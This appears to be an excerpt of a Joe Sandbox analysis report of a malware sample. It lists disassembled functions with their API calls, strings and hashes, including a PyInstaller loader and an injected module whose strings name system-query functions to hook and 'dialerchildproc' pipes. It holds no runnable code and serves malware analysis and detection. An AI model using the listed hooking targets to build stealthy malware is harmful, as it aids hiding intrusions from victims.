                                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction Fuzzy Hash: 3C31617230AB828AEB60AF60E8803EE7361F784754F484039EA4D47BA4EF38C559C710
                                                                    APIs
                                                                    • _get_daylight.LIBCMT ref: 00007FF727284F55
                                                                      • Part of subcall function 00007FF7272848A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7272848BC
                                                                      • Part of subcall function 00007FF727279C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF727282032,?,?,?,00007FF72728206F,?,?,00000000,00007FF727282535,?,?,?,00007FF727282467), ref: 00007FF727279C6E
                                                                      • Part of subcall function 00007FF727279C58: GetLastError.KERNEL32(?,?,?,00007FF727282032,?,?,?,00007FF72728206F,?,?,00000000,00007FF727282535,?,?,?,00007FF727282467), ref: 00007FF727279C78
                                                                      • Part of subcall function 00007FF727279C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF727279BEF,?,?,?,?,?,00007FF727279ADA), ref: 00007FF727279C19
                                                                      • Part of subcall function 00007FF727279C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF727279BEF,?,?,?,?,?,00007FF727279ADA), ref: 00007FF727279C3E
                                                                    • _get_daylight.LIBCMT ref: 00007FF727284F44
                                                                      • Part of subcall function 00007FF727284908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72728491C
                                                                    • _get_daylight.LIBCMT ref: 00007FF7272851BA
                                                                    • _get_daylight.LIBCMT ref: 00007FF7272851CB
                                                                    • _get_daylight.LIBCMT ref: 00007FF7272851DC
                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72728541C), ref: 00007FF727285203
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                                    • String ID:
                                                                    • API String ID: 1458651798-0
                                                                    • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                    • Instruction ID: 0d88eb118e69619478ba05f88d670711572bdd92cb16d24e79001e238e4aaf3d
                                                                    • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                    • Instruction Fuzzy Hash: B9D1A126E0826286E720BF22DE401B9A7F6EF46794FC44135EA4D87685DF3DE442CB70
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction ID: aedab5b534363bc5524e5b5ead437ee367f015d2dffc3019cb1706de4066e196
                                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction Fuzzy Hash: 07317532219F828ADB60DF25E8403EE73A5F7897A4F540135EA9D43BA8DF38C556CB00
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF7272650C0
                                                                    • GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF727265101
                                                                    • GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF727265126
                                                                    • GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF72726514B
                                                                    • GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF727265173
                                                                    • GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF72726519B
                                                                    • GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF7272651C3
                                                                    • GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF7272651EB
                                                                    • GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF727265213
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc
                                                                    • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                    • API String ID: 190572456-2007157414
                                                                    • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                    • Instruction ID: 18540e86d36fc129105e775678c1774e032f9ee213a25653d8f3f94597ffde1f
                                                                    • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                    • Instruction Fuzzy Hash: D312D96090BB5390FA15BB05BF101B0A3F4EF0B750FD4657AC91E512A1EF3EB58A9A70
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc
                                                                    • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                    • API String ID: 190572456-3427451314
                                                                    • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                    • Instruction ID: 9f4d78c090ae19d138f79111286f0083da7d397685eaf23d8990458eab216d70
                                                                    • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                    • Instruction Fuzzy Hash: 9DE1C864919B4391FA14BB15BF005B4E3F1EF0A760FD8513AC81D823A5EF3EB54A9A70
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                    • String ID: d
                                                                    • API String ID: 2005889112-2564639436
                                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction ID: 47775d3dd0e5d47ce93f6b1e5424105503f5857ad38b65448786ae5747e87bb0
                                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction Fuzzy Hash: F4513C36619B878AEB54DF62E5443AA77A2F789BE5F084134EE4907768DF3CC066C700
                                                                    APIs
                                                                      • Part of subcall function 00007FF7272686B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF727263FA4,00000000,00007FF727261925), ref: 00007FF7272686E9
                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00007FF727267C97,?,?,FFFFFFFF,00007FF727263834), ref: 00007FF72726782C
                                                                      • Part of subcall function 00007FF7272626C0: MessageBoxW.USER32 ref: 00007FF727262736
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                    • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                    • API String ID: 1662231829-930877121
                                                                    • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                    • Instruction ID: 0d1bd7e15d648015f3e74c43c7d04d87f4c414f0374a9cc1757366ecd09ca309
                                                                    • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                    • Instruction Fuzzy Hash: 3541B311A1964381FA50BB21EE516BAF2F1EF46784FC4943BD54E82695FF2CE5068F30
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                    • API String ID: 4175298099-1975688563
                                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction ID: e5e224d6babc261c74393206066095f254b5e0cddc1dcea3658c24014c28461c
                                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction Fuzzy Hash: A631907822AA4BA0EA05FF66EC557F96323B7043A4F8C41739419125759F388A7BC350
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                    • API String ID: 190073905-1786718095
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: 1aeae8a8433cfaa2caaf70dbc10e228fffb9bb1b2dfa00e2c953a5a9f73f6c56
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: CF81A13160D24386F662BF7594413F962A3EB65BA0F5C493DBB4583796DB38C85EC700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                    • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                    • API String ID: 190073905-1786718095
                                                                    • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction ID: 2c3affaa97a1980012cff364d1e3f3ea2a776fdc2121df42592993ca4a77dcd1
                                                                    • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                    • Instruction Fuzzy Hash: 2481EF7270F64386FA54BF66E4403F962E3AB847B0F5C8034B94583796EB38C967A700
                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 000001F91B32CE37
                                                                    • FlsGetValue.KERNEL32(?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CE4C
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CE6D
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CE9A
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CEAB
                                                                    • FlsSetValue.KERNEL32(?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CEBC
                                                                    • SetLastError.KERNEL32 ref: 000001F91B32CED7
                                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CF0D
                                                                    • FlsSetValue.KERNEL32(?,?,00000001,000001F91B32ECCC,?,?,?,?,000001F91B32BF9F,?,?,?,?,?,000001F91B327AB0), ref: 000001F91B32CF2C
                                                                      • Part of subcall function 000001F91B32D6CC: HeapAlloc.KERNEL32 ref: 000001F91B32D721
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CF54
                                                                      • Part of subcall function 000001F91B32D744: HeapFree.KERNEL32 ref: 000001F91B32D75A
                                                                      • Part of subcall function 000001F91B32D744: GetLastError.KERNEL32 ref: 000001F91B32D764
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CF65
                                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CF76
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast$Heap$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 570795689-0
                                                                    • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction ID: 781918e1f78d9188d7eb8c586794af5370965203db440fbb91f37b18ea652277
                                                                    • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                    • Instruction Fuzzy Hash: 62414F3430F64756FA69BFB556563FD2253AB447F0F6C07B4A836066E6DE2884338200
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                    • String ID: P%
                                                                    • API String ID: 2147705588-2959514604
                                                                    • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                    • Instruction ID: 9cf9bd36a8926795a79f5591b4bce6ee28f81efbdbc79d4c9c34316584ce5468
                                                                    • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                    • Instruction Fuzzy Hash: 855107266087A186D6249F22B8181BAF7F1F798B61F444135EBDE83685DF3CD046DB20
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                    • API String ID: 2030045667-3659356012
                                                                    • Opcode ID: 18a8bc01bb379e61637bb3a06a66d93779c183dd83d6a2d2a34fa46513ab6cd6
                                                                    • Instruction ID: 6717cffde8da4e1cb06114ec1e9b1a697f8347ef56d30e7698a4fa5a3dd7b055
                                                                    • Opcode Fuzzy Hash: 18a8bc01bb379e61637bb3a06a66d93779c183dd83d6a2d2a34fa46513ab6cd6
                                                                    • Instruction Fuzzy Hash: 27417E61E0865282EA14BB12AE405B6E3F1FF46BC4F94903ADD4D47B96DF3CF5068B20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                    • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                    • API String ID: 2171963597-1373409510
                                                                    • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction ID: 1078222668cbc480c5b0a00a4362b428e62a0ff7fd64350240db004a36731114
                                                                    • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                    • Instruction Fuzzy Hash: 5F21323561D64387E7109F25E9443AA73A2F785BA4F580235EA5902AA4CF7CC156CF00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction ID: 59f83508780dbde94a4b707c350676a79b104be26223aee3752673fbadbc8519
                                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction Fuzzy Hash: 22E18F726087438AFB60AF65D4403ED77A2F7697A8F180939EF4957B99CB34C499CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction ID: 0ce0ca53f7dee72d9348c0305a4b8004eebc76af930ff28b00810a6a85fcdcda
                                                                    • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                    • Instruction Fuzzy Hash: 2EE1807260A7478AEB20AF65D4413ED77A2F749BE8F180175EE8957B95CB34D0A3C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction ID: 487812e8f4f214aa6077bbf880215ca06265161a1b7204dbf3dafa236b89e688
                                                                    • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                    • Instruction Fuzzy Hash: 85E1A37260A7838AEB60EF65D4403ED77E6F7467A8F180235EE8957B95CB34C4A6C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true
                                                                    • Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd
                                                                    Similarity
                                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 849930591-393685449
                                                                    • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                    • Instruction ID: 1ffebac7ac7ef5d3bab7c146ae6a19ff31e54a44505e9b0358cf0137de9e05c8
                                                                    • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                    • Instruction Fuzzy Hash: D8D1A572E0878586EB20AB25D9403ADB7F0FB46788F50913ADE4D57799CF38E492CB10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3013587201-537541572
                                                                    • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
